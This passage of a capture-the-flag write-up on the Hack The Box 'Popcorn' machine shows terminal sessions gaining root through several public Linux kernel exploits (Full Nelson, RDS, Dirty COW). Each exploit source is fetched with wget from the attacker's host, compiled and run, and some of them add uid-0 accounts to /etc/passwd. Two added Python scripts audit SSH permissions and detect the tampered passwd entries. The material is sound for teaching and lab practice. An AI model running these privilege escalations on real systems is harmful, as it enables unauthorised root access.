[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: toor
root@popcorn:/tmp# whoami
root
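The debugging detour above comes down to one sshd rule: with StrictModes (the default) it ignores authorized_keys when the file, the .ssh directory or the home directory is group/world writable or owned by someone else. As an added example (not part of the writeup or of the exploit script), the check below reproduces that rule over a throwaway home directory, replays the mode 777 .ssh directory found on the box, then applies the chmod 700 fix; the function and directory layout are my own construction.

```python
"""Reproduce sshd's StrictModes check over an authorized_keys path
(added example; not code from the writeup or the CVE-2010-0832 script)."""
import os
import stat
import tempfile
from typing import List, Tuple


def strict_modes_problems(home: str, key_file: str, uid: int) -> List[str]:
    """Walk from key_file up to and including home, as sshd does, and report
    every component not owned by uid (or root) or writable by group/others."""
    problems: List[str] = []
    home = os.path.abspath(home)
    path = os.path.abspath(key_file)
    while True:
        st = os.stat(path)
        if st.st_uid not in (uid, 0):
            problems.append(f"{path}: owned by uid {st.st_uid}, expected {uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append(
                f"{path}: group/world writable (mode {oct(st.st_mode & 0o777)})")
        if path == home or os.path.dirname(path) == path:
            break
        path = os.path.dirname(path)
    return problems


def replay_popcorn_state() -> Tuple[List[str], List[str]]:
    """Build a temporary home, recreate the drwxrwxrwx .ssh directory that
    ls -ld showed on the box, then apply chmod 700. Returns (before, after)."""
    with tempfile.TemporaryDirectory() as home:
        ssh_dir = os.path.join(home, ".ssh")
        os.mkdir(ssh_dir)
        key_file = os.path.join(ssh_dir, "authorized_keys")
        with open(key_file, "w") as fh:
            # Constructed placeholder line, not a real public key.
            fh.write("ssh-rsa AAAA-constructed-placeholder pam\n")
        os.chmod(home, 0o755)
        os.chmod(key_file, 0o600)
        uid = os.getuid()

        os.chmod(ssh_dir, 0o777)          # state found on the box
        before = strict_modes_problems(home, key_file, uid)

        os.chmod(ssh_dir, 0o700)          # the fix applied in the writeup
        after = strict_modes_problems(home, key_file, uid)
        return before, after


if __name__ == "__main__":
    before, after = replay_popcorn_state()
    print("before chmod 700:", before)   # one finding: the .ssh directory
    print("after  chmod 700:", after)    # []
```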
Full Nelson (ExploitDB 15704 CVE-2010-4258 CVE-2010-3850 CVE-2010-3849)
u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 15704
  Exploit: Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15704
     Path: /usr/share/exploitdb/exploits/linux/local/15704.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Popcorn/www/15704.c
Transfer to target
www-data@popcorn:/tmp$ wget http://10.10.14.28/15704.c
--2020-03-10 11:16:08--  http://10.10.14.28/15704.c
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `15704.c'

100%[======================================>] 9,487       --.-K/s   in 0.04s

2020-03-10 11:16:08 (217 KB/s) - `15704.c' saved [9487/9487]
Compilation and execution
www-data@popcorn:/tmp$ gcc 15704.c -o 15704
www-data@popcorn:/tmp$ ./15704
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf8431280
[+] Resolved econet_ops to 0xf8431360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root
CVE-2010-3904 (ExploitDB 15285)
From https://nvd.nist.gov/vuln/detail/CVE-2010-3904:

The rds_page_copy_user function in net/rds/page.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel before 2.6.36 does not properly validate addresses obtained from user space, which allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls.

u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 15285
  Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15285
     Path: /usr/share/exploitdb/exploits/linux/local/15285.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Popcorn/www/15285.c
Push the source code to the target.
www-data@popcorn:/tmp$ wget http://10.10.14.28/15285.c
--2020-03-10 11:31:54--  http://10.10.14.28/15285.c
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `15285.c'

100%[======================================>] 7,155       --.-K/s   in 0.04s

2020-03-10 11:31:54 (160 KB/s) - `15285.c' saved [7155/7155]
Compilation and execution.
www-data@popcorn:/tmp$ gcc 15285.c -o 15285
www-data@popcorn:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc089b908
[+] Resolved default_security_ops to 0xc075e2a0
[+] Resolved cap_ptrace_traceme to 0xc02caf30
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root
Dirty Cow (CVE-2016-5195 ExploitDB 40839)
The last exploit I tried on this box is Dirty COW.
From https://nvd.nist.gov/vuln/detail/CVE-2016-5195:

Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."
u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit dirty cow
--------------------------------------------------------- ----------------------------------------
 Exploit Title                                           |  Path
                                                         | (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/s | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' R | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA'  | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem R | exploits/linux/local/40611.c
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 40839
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Popcorn/www/40839.c
From the target machine
www-data@popcorn:/tmp$ wget http://10.10.14.28/40839.c
--2020-03-10 12:24:17--  http://10.10.14.28/40839.c
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/plain]
Saving to: `40839.c'

100%[======================================>] 5,006       --.-K/s   in 0s

2020-03-10 12:24:17 (438 MB/s) - `40839.c' saved [5006/5006]

www-data@popcorn:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@popcorn:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: hello
Complete line:
firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash

mmap: b77e3000
The process doesn't finish, but after a few seconds we try to log in over ssh.
u505@kali:~/HTB/Machines/Popcorn/www$ ssh firefart@popcorn.htb
The authenticity of host 'popcorn.htb (10.10.10.6)' can't be established.
RSA key fingerprint is SHA256:V1Azfw43WixBJWVAsqnBuoCdUrthzn2x6VQiZjAUusk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'popcorn.htb,10.10.10.6' (RSA) to the list of known hosts.
firefart@popcorn.htb's password: 
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/

  System information as of Tue Mar 10 12:26:21 EET 2020

  System load: 2.29              Memory usage: 6%   Processes:       119
  Usage of /:  6.2% of 14.80GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sun Sep 24 18:01:48 2017
firefart@popcorn:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:~# ps -ef | grep dirt
www-data  1445  1421 12 12:25 pts/1    00:00:38 ./dirty
www-data  1446  1445 12 12:25 pts/1    00:00:36 ./dirty
firefart  1514  1498  0 12:30 pts/2    00:00:00 grep dirt
firefart@popcorn:~# kill 1445
We kill the exploit process; the race condition stops.
mmap: b77e3000
Terminated
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'hello'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
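Both root paths on this box leave the same trace: the PAM MOTD script adds the toor line and Dirty COW writes the firefart line, each a uid-0 account, the latter with its hash stored in /etc/passwd itself. As an added example (not part of the writeup), the audit below parses passwd text, flags uid-0 accounts other than root, hashes kept outside /etc/shadow and accounts absent from a baseline copy (the exploit even left one at /tmp/passwd.bak). The two tampered lines are taken from the writeup; the rest of the sample is constructed.

```python
"""Audit /etc/passwd for the tampering left behind by the two root exploits
(added example, not part of the writeup)."""
from typing import Dict, List, Tuple

# Constructed baseline: a plausible pre-exploit passwd excerpt.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
george:x:1000:1000:George,,,:/home/george:/bin/bash
"""

# Constructed post-exploit state; the two appended lines are the ones the writeup shows.
TAMPERED_PASSWD = BASELINE_PASSWD + """\
firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash
toor:x:0:0:root:/root:/bin/bash
"""

Entry = Dict[str, str]


def parse_passwd(text: str) -> List[Entry]:
    """Split passwd text into 7-field records. Malformed lines are kept with a
    'malformed' marker so the audit reports them instead of silently skipping."""
    entries: List[Entry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"name": f"<line {lineno}>", "malformed": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(current: str, baseline: str) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs for every suspicious entry in `current`."""
    findings: List[Tuple[str, str]] = []
    known = {e["name"] for e in parse_passwd(baseline) if "malformed" not in e}
    for e in parse_passwd(current):
        if "malformed" in e:
            findings.append((e["name"], "malformed entry: " + e["malformed"]))
            continue
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["name"], "uid 0 account other than root"))
        # 'x' means the hash lives in /etc/shadow; '*' or a '!' prefix locks the
        # account. An empty field needs no password, anything else is a usable
        # hash sitting in a world-readable file.
        if e["pw"] == "":
            findings.append((e["name"], "empty password field (no password required)"))
        elif e["pw"] not in ("x", "*") and not e["pw"].startswith("!"):
            findings.append((e["name"], "password hash stored in passwd, bypassing shadow"))
        if e["name"] not in known:
            findings.append((e["name"], "account absent from baseline copy"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(TAMPERED_PASSWD, BASELINE_PASSWD):
        print(f"{account:10} {finding}")
```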
Root Flag
root@popcorn:/tmp# cat /root/root.txt <ROOT_FLAG>
References
- https://nvd.nist.gov/vuln/detail/CVE-2010-0832
- https://www.exploit-db.com/exploits/15704
- https://nvd.nist.gov/vuln/detail/CVE-2010-3904
- https://nvd.nist.gov/vuln/detail/CVE-2016-5195
Daniel Simao 18:22, 9 March 2020 (EDT)